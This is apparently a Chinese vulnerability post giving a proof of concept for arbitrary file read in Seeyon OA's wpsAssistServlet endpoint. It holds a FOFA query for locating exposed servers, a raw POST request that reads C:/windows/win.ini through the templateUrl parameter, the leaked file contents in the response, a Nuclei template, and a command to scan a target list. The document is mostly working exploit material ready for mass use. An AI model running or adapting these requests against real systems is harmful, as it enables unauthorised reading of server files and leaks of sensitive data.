致远OA wpsAssistServlet 任意文件读取漏洞（附POC）

app="致远互联-OA"&&title="V8.0SP2"

POST /seeyon/wpsAssistServlet HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36Content-Length: 44Accept: */*Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedflag=template&templateUrl=C:/windows/win.ini

HTTP/1.1 200 Connection: closeContent-Length: 92Content-Disposition: attachment; filename=win.iniContent-Type: application/octet-stream;charset=UTF-8Date: Tue, 31 Oct 2023 01:52:54 GMTServer: SY8045; for 16-bit app support[fonts][extensions][mci extensions][files][Mail]MAPI=1

id: seeyon-wpsAssistServlet-anyfilereadinfo:  name: 致远OA wpsAssistServlet 任意文件读取漏洞  author: fgz  description: '用友致远有A6和A8两大协同软件产品线：A6协同管理软件以其成熟稳定、“易用、好用、适用”的产品特性被业界誉为“协同经典”。2007年底发布的A8协同管理软件，以强力支持集团化、多语言和跨平台应用为特点，被业界誉为“中国协同应用软件的新标准”。致远互联-OA wpsAssistServlet接口存在任意文件读取漏洞容易造成敏感信息泄露。'  severity: high  tags: fileread,2023  metadata:    fofa-qeury: app="致远互联-OA" && title="V8.0SP2"    veified: true    max-request: 3http:  - raw:      - |        POST /seeyon/wpsAssistServlet HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36        Accept: */*        Connection: close        Content-Type: application/x-www-form-urlencoded        flag=template&templateUrl=C:/windows/win.ini    matchers-condition: and    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body, 'bit app support')"

.nuclei.exe -t mypoc/致远/seeyon-wpsAssistServlet-anyfileread.yaml -l 1.txt